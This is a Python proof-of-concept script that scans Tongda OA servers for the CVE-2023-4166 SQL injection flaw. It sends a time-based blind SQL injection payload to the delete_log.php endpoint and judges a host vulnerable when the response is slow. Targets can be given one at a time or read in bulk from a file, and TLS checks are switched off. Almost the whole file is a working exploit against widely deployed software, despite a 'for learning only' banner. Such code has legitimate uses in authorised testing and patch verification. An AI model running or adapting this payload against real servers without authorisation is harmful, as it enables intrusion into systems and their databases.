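import argparse

import requests

# Every request below is sent with verify=False, so silence the
# InsecureRequestWarning that urllib3 would otherwise emit per call.
requests.packages.urllib3.disable_warnings()


# 通达 OA CVE-2023-4166 SQL 注入漏洞 — time-based detection script.
# The verdict is a timing heuristic (see poc()), not a proof: a slow or
# unreachable host is reported as indeterminate rather than as vulnerable
# or clean.


def Banner():
    """Print the tool banner: ASCII-art title, tag, version, author, notice."""
    banner = """
 _____ __ __ ______ ___ ___ ___ ____ _ _ __ __ __
/ ____| \\ \\ / / | ____| |__ \\ / _ \\ |__ \\ |___ \\ | || | /_ | / / / /
| | \\ \\ / / | |__ ______ ) | | | | | ) | __) | ______ | || |_ | | / /_ / /_
| | \\ \\/ / | __| |______| / / | | | | / / |__ < |______| |__ _| | | | '_ \\ | '_ \\
| |____ \\ / | |____ / /_ | |_| | / /_ ___) | | | | | | (_) | | (_) |
 \\_____| \\/ |______| |____| \\___/ |____| |____/ |_| |_| \\___/ \\___/
tag: 通达 OA_CVE-2023-4166sql 注入漏洞 POC
@version: 1.0.0
@author by ghhycsec
仅限学习使用,请勿用于非法测试!
"""
    print(banner)


def poc(url):
    """Check one target for CVE-2023-4166 and print the verdict.

    Args:
        url: target host or URL. A value without an ``http://`` /
            ``https://`` scheme is prefixed with ``http://``.

    The request is classed as vulnerable when the server takes more than
    13 s to answer, and as not vulnerable otherwise. A request that fails
    or exceeds the 15 s socket timeout is printed as indeterminate, because
    neither outcome says anything about the target.
    """
    payload = "/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 "
    # Test the scheme explicitly; a plain substring test for "http" would
    # accept any URL that merely contains those letters in its path.
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    fullpath = url + payload
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/116.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zhHK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
    }
    try:
        response = requests.get(fullpath, headers=header, verify=False, timeout=15)
    except requests.RequestException as exc:
        # Connection errors and timeouts used to be reported as "not
        # vulnerable"; they are really "could not tell", so say that.
        print("[!]%s 请求失败,无法判断: %s" % (url, exc))
        return
    # elapsed.seconds is whole seconds; the 13 s threshold leaves headroom
    # below the 15 s timeout.
    if response.elapsed.seconds > 13:
        print("[+]%s 存在 CVE-2023-4166 sql 注入" % (url))
    else:
        print("[-]%s 不存在 CVE-2023-4166 sql 注入" % (url))


def main():
    """Parse ``-u``/``-f`` and run poc() against every target."""
    Banner()
    # The description previously named a different CVE (copy-paste leftover).
    parser = argparse.ArgumentParser(description="CVE-2023-4166 检测工具")
    parser.add_argument("-u", "--target", help="单个目标URL")
    parser.add_argument("-f", "--file", help="包含多个目标URL的文件")
    args = parser.parse_args()
    if args.target:
        target_urls = [args.target]
    elif args.file:
        with open(args.file, "r", encoding="utf-8") as f:
            # Drop blank lines so a trailing newline does not become a
            # request to "http://".
            target_urls = [line.strip() for line in f if line.strip()]
    else:
        print("请使用 -u 或 -f 指定目标")
        return
    for url in target_urls:
        poc(url)


if __name__ == "__main__":
    main()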